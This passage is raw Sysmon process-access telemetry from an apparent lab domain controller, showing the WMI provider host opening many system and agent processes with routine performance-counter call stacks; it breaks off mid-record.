13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006232Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006231Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006230Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006229Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006228Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006227Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006226Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006225Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006224Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006223Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006222Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006221Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006220Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006219Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006218Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006217Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006216Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006215Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006214Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006213Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006212Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006211Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006210Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006209Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program 